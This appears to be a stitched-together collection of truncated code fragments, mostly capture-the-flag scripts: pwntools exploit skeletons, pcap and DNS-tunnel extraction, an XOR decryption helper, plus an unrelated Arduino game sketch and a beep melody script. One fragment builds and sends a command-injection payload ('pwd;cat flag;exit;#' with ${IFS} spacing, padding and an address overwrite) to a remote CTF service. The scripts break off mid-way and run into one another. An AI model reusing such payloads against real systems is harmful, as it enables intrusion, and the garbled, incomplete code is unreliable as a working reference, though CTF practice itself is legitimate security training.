#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *
from binascii import hexlify,unhexlify
# Set up pwntools for the correct architecture
# Load the target ELF and hand it to pwntools as the context binary, so the
# context (architecture and friends) is derived from the file rather than set by hand.
exe = ELF('./pilot')
context.binary = exe
# Many built-in settings can be controlled on the command-line and show up
# in "args". For example, to dump all data sent/received, and disable ASLR
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *
# Set up pwntools for the correct architecture
# Load the target ELF and hand it to pwntools as the context binary, so the
# context (architecture and friends) is derived from the file rather than set by hand.
exe = ELF('scv')
context.binary = exe
# Many built-in settings can be controlled on the command-line and show up
# in "args". For example, to dump all data sent/received, and disable ASLR
# for all created processes...
import scapy.all as scapy
import scapy_http.http
import urlparse
import binascii
# Accumulator for the values pulled out of the capture; what exactly it
# collects is not visible in these lines (the "x" values, judging by the comment below).
xlist = []
# Read the whole capture into memory up front.
p = scapy.rdpcap("cap.pcap")
##So we figured it was probably x because the "x" values were past the content length
#!/usr/bin/env python2
import binascii
import re
import string
#f = open("encrypted", "rb")
#n = f.read()[:-1].decode("hex")
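# Hex-encoded ciphertext under analysis (originally read from the file
# `encrypted`, see the commented-out lines above). binascii.unhexlify works on
# both Python 2 and 3, whereas str.decode("hex") only exists on Python 2;
# the result is a byte string (str on Python 2, bytes on Python 3).
n = binascii.unhexlify(
    "274c10121a0100495b502d551c557f0b0833585d1b27030b5228040d3753490a1c0254"
    "15051525455118001911534a0052560a14594f0b1e490a010c4514411e070014615a18"
    "1b02521b580305170002074b0a1a4c414d1f1d171d00151b1d0f480e491e0249010c15"
    "0050115c505850434203421354424c1150430b5e094d144957080d4444254643"
)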
def xor(s1, s2):
    """Character-wise XOR of two strings, truncated to the shorter input.

    Each character of ``s1`` is XORed with the character at the same index in
    ``s2``; ``zip`` stops at the end of the shorter string, so the result never
    exceeds ``min(len(s1), len(s2))`` characters. Returns a str.
    """
    mixed = [ord(left) ^ ord(right) for left, right in zip(s1, s2)]
    return ''.join(map(chr, mixed))
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *
# Set up pwntools for the correct architecture
# Placeholder path to the target binary; nothing is loaded from it here, so the
# architecture has to be told to pwntools explicitly.
exe = './path/to/binary'
context.arch = 'i386'
# Many built-in settings can be controlled on the command-line and show up
# in "args". For example, to dump all data sent/received, and disable ASLR
# Any command-line argument selects a local run with ASLR disabled (reproducible
# addresses while debugging); with no argument the script talks to the remote service.
# NOTE(review): `filename`, `process`, `remote` and `sys` are not bound in the
# lines shown here — confirm they are provided by an earlier import and assignment.
Debug = len(sys.argv) > 1
if Debug:
    conn = process(filename, aslr=False)
else:
    conn = remote("pwn.sect.ctf.rocks", 31337)
from pwn import *
conn = remote("pwn2.sect.ctf.rocks", 6666)
payload='pwd;cat flag;exit;#'
payload=payload.replace(" ","${IFS}")
payload+='A'* (512-len(payload))
payload+='date'+ '\xa4\x10\x60'
print("%r" % payload)
conn.sendline("0")
SwissKid / better_extract_dns.py
Toorcon CTF - Triforce
#!/usr/bin/env python
# Hack.lu 2010 CTF - Challenge #9 "Bottle"
# Extract iodine DNS tunnel data
# -- StalkR
from scapy.all import *
from subprocess import Popen,PIPE
# Capture to read and the file the extracted data is written to.
# NOTE(review): `input` shadows the builtin of the same name; it is kept as-is
# because code further down (not shown here) may refer to it.
input = "Triforce.pcap"
output = "test_extracted.cap"
# Domain suffix of the tunnel queries, leading and trailing dots included.
topdomain = ".angler.wetun.nl."
# NOTE(review): the meaning of 128 is not visible in these lines — presumably
# the upstream data encoding; confirm against the decoding code below.
upstream_encoding = 128
// Wiring and the initial sketch adapted from
// http://elimelecsarduinoprojects.blogspot.com/2013/06/measure-rpms-arduino.html
// (only the wiring setup was really reused).

// ---- RPM measurement state ----
// `volatile` because the count is presumably updated from an interrupt handler
// (see http://arduino.cc/en/Reference/Volatile); the handler itself is not shown here.
volatile int rpmcount = 0;
float rpm = 0.0f;
// Millisecond timestamps used for the rate calculation (exact use not shown here).
unsigned long lastmillis = 0UL;
unsigned long millis2 = 0UL;
int rotTime = 0;
bool badOne = false;

// ---- Game state ----
int dinostep = 0;
int userstep = 1;
// NOTE(review): declared int but initialised from a bool; starts at 0 either way.
int gameStart = false;
SwissKid / imperialmarch.sh
Beep Orchestra
#!/bin/bash
beep -l 350 -f 392 -D 100 -n -l 350 -f 392 -D 100 -n -l 350 -f 392 -D 100 -n -l 250 -f 311.1 -D 100 -n -l 25 -f 466.2 -D 100 -n -l 350 -f 392 -D 100 -n -l 250 -f 311.1 -D 100 -n -l 25 -f 466.2 -D 100 -n -l 700 -f 392 -D 100 -n -l 350 -f 587.32 -D 100 -n -l 350 -f 587.32 -D 100 -n -l 350 -f 587.32 -D 100 -n -l 250 -f 622.26 -D 100 -n -l 25 -f 466.2 -D 100 -n -l 350 -f 369.99 -D 100 -n -l 250 -f 311.1 -D 100 -n -l 25 -f 466.2 -D 100 -n -l 700 -f 392 -D 100 -n -l 350 -f 784 -D 100 -n -l 250 -f 392 -D 100 -n -l 25 -f 392 -D 100 -n -l 350 -f 784 -D 100 -n -l 250 -f 739.98 -D 100 -n -l 25 -f 698.46 -D 100 -n -l 25 -f 659.26 -D 100 -n -l 25 -f 622.26 -D 100 -n -l 50 -f 659.26 -D 400 -n -l 25 -f 415.3 -D 200 -n -l 350 -f 554.36 -D 100 -n -l 250 -f 523.25 -D 100 -n -l 25 -f 493.88 -D 100 -n -l 25 -f 466.16 -D 100 -n -l 25 -f 440 -D 100 -n -l 50 -f 466.16 -D 400 -n -l 25 -f 311.13 -D 200 -n -l 350 -f 369.99 -D 100 -n -l 250 -f 311.13 -D 100 -n -l 25 -f 392 -D 100 -n -l 350 -f 466.16 -D 100 -n -l 250 -f 392